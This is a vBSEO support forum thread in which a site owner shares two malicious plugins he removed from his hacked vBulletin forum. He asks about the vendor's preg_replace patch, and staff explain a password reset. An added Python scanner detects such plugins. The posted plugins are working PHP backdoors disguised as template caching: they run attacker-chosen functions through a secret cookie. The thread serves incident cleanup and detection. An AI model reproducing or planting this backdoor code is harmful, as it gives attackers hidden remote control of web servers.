
vBSEO Security Issue


  1. #1
    Junior Member The Wise Man's Avatar
    Real Name
    Mr X
    Join Date
    Jan 2011
    Location
    UK
    Posts
    28
    Liked
    0 times

    vBSEO Security Issue

    Looking at the *vBSEO Security Bulletin* All Supported Versions: Patch Release thread, I am unable to comment on it there, as it has been "Closed".

    I too was affected by this. I had TWO plugins (now deleted):

    Code:
    Product:  vBulletin
    
    Hook Location:  global_complete
    
    Title:  vBulletin Templates Cookie Caching
    
    Execution Order:  5
    
    /* vBulletin Templates Cookie Caching */
    $vbr="jzdztvka";$vbh="ce7d14e6582cfd68ac152f0691ebf09b";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
    Code:
    Product:  vBulletin
    
    Hook Location:  global_complete
    
    Title:  vBulletin Templates Cookie Caching
    
    Execution Order:  5
    
    /* vBulletin Templates Cookie Caching */
    $vbr="qjl{hd{{";$vbh="74456513a5ced7559c558c36cd1a64d7";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
    AdminCP SCREENSHOT:


    hacked-not-1.png

    On reading the OP, it stated that I could either do the change manually or download the vBSEO folder and change it via FTP.

    The change as mentioned in the OP was:


    Otherwise, the simple fix is to edit the file

    Code:
    /vbseo/includes/functions_vbseocp_abstract.php

    Find:

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
    $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
    return $ptxt;
    }
    Replace with:

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
    $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
    return $ptxt;
    }
    I did that and then I came across this (note the Updated all patch files):
    If you've
    - updated all patch files
    - scanned plugin list and deleted any bad ones
    - cleared your personal browser sessions/cookies (as this seems to write a cookie)
    - scanned your files/folders for any rogue files
    - changed ALL passwords including all admin accounts, ftp, database password, and any htaccess passwords
    and you're still getting this to come back, we need your help to pinpoint it more. Sift through your server logs and see if there's anything in there that might be related to the attack. It's possible that YOU logging in are causing it to go again if you've been cookied with the data and there's a script looking for it.
    Can be read, here: *vBSEO Security Bulletin* All Supported Versions: Patch Release


    I was under the impression that only ONE (1) change had to be made. Is this Not the case and that more than one change has to be made?

    IE:
    - updated all patch files

    Confirmation would be great - Thanks.
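
The "scanned plugin list and deleted any bad ones" step from the quoted checklist, as an added example that is not part of the original posts and is not vBSEO or vBulletin code. It assumes the plugin records have already been exported as (title, hook, code) tuples; the indicator names, the sample records and the placeholder digest are constructed for illustration.

```python
import re

# Indicators taken from the structure of the plugin code quoted in the post above.
INDICATORS = {
    "request_input": re.compile(r"\$_(COOKIE|GET|POST|REQUEST)\b"),
    # a call whose function name is held in a variable, e.g. $m[2]($m[3])
    "variable_call": re.compile(r"\$\w+(\s*\[[^\]]*\])*\s*\("),
    # md5(...) compared against a hard-coded 32-hex digest (a shared-secret gate)
    "hardcoded_md5": re.compile(r"md5\s*\([^;]*?[=!]==?\s*[\"'][a-f0-9]{32}[\"']", re.I),
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
}

def scan_plugin(code):
    """Return the sorted names of the indicators present in one plugin's PHP code."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(code))

def verdict(hits):
    """Request data reaching a dynamic call is the backdoor shape; the rest needs a human."""
    dynamic = {"variable_call", "dynamic_eval"} & set(hits)
    if dynamic and "request_input" in hits:
        return "backdoor-like"
    if dynamic or "hardcoded_md5" in hits:
        return "review"
    return "no match"

# Constructed plugin records (title, hook, code). The first mirrors the quoted plugin
# with a placeholder digest; the other two are ordinary-looking plugins.
SAMPLE_PLUGINS = [
    ("vBulletin Templates Cookie Caching", "global_complete",
     r'''(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="00000000000000000000000000000000")'''
     r'''&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m))?$m[2]($m[3]):chr(10);'''),
    ("Guest welcome flag", "global_start",
     r'''$show['welcome'] = ($vbulletin->userinfo['userid'] == 0);'''),
    ("Style from cookie", "global_start",
     r'''if (isset($_COOKIE['bbstyleid'])) { $styleid = intval($_COOKIE['bbstyleid']); }'''),
]

def audit(plugins):
    """Map each plugin title to (verdict, indicators) so flagged entries can be reviewed."""
    return {title: (verdict(h), h) for title, _hook, code in plugins
            for h in [scan_plugin(code)]}

if __name__ == "__main__":
    for title, (v, hits) in audit(SAMPLE_PLUGINS).items():
        print(f"{v:14} {title}: {', '.join(hits) or '-'}")
```

A plugin title proves nothing here: the flagged record carries an innocuous-sounding name, so the verdict is driven only by what the code does with request data.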

  2. #2
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    657 times
    Blog Entries
    2
    It is just the one change. Sorry if the plural threw you off.

  3. #3
    Junior Member The Wise Man's Avatar

    How do I change Password on my vBSEO Control Panel - VBSEOCP

    Quote: Originally Posted by Brian Cummiskey
    It is just the one change. Sorry if the plural threw you off.

    Thanks Brian.


    Just one more thing (and I have added it to the title of this post for SEO purposes for vBSEO):


    How do I change the Password on my vBSEO Control Panel - VBSEOCP, please? I think I am having a "Blonde" moment, and can't see it. :(

  4. #4
    vBSEO Staff Brian Cummiskey's Avatar
    If you are using vBSEO 3.5.x series or higher, please follow these steps:

    * First you must locate your vbseo/resources/xml/config.xml file.

    * Download it to your PC, then open the file with a text editor and search for something similar to this:

    <setting>
    <name>VBSEO_ADMIN_PASSWORD</name>
    <value>e7ea6f5be6c2d2d64538c7a6qwe87weas</value>
    </setting>

    * Yours will be the same except for the random string (e7ea6f5be6c2d2d64538c7a6qwe87weas).

    * Remove that from the line so it now looks like this:

    <setting>
    <name>VBSEO_ADMIN_PASSWORD</name>
    <value></value>
    </setting>

    * Upload the file to the web server.

    * Open your vBSEO control panel. When you try to log in, you will see the option to add in your new password and confirm it.

    * Finally, CHMOD the file back to 644 when you are finished.



    If you are using vBSEO 3.3.x series or lower, please follow these steps:

    * First you must locate your vB-root/includes/config_vbseo.php file.

    * Download it to your PC, then open the file with a text editor and search for something similar to this:

    // ****** CONFIG PANEL PASSWORD ******
    define('VBSEO_ADMIN_PASSWORD', 'e7ea6f5be6c2d2d64538c7a6qwe87weas');

    * Yours will be the same except for the random string (e7ea6f5be6c2d2d64538c7a6qwe87weas).

    * Remove that from the line so it now looks like this:

    // ****** CONFIG PANEL PASSWORD ******
    define('VBSEO_ADMIN_PASSWORD', '');

    * Upload the file to the web server.

    * Open your vBSEO control panel. When you try to log in, you will see the option to add in your new password and confirm it.

    * Finally, CHMOD the file back to 644 when you are finished.


    If you follow these steps correctly, you will be able to reset your password and log in again to your vBSEO CP.
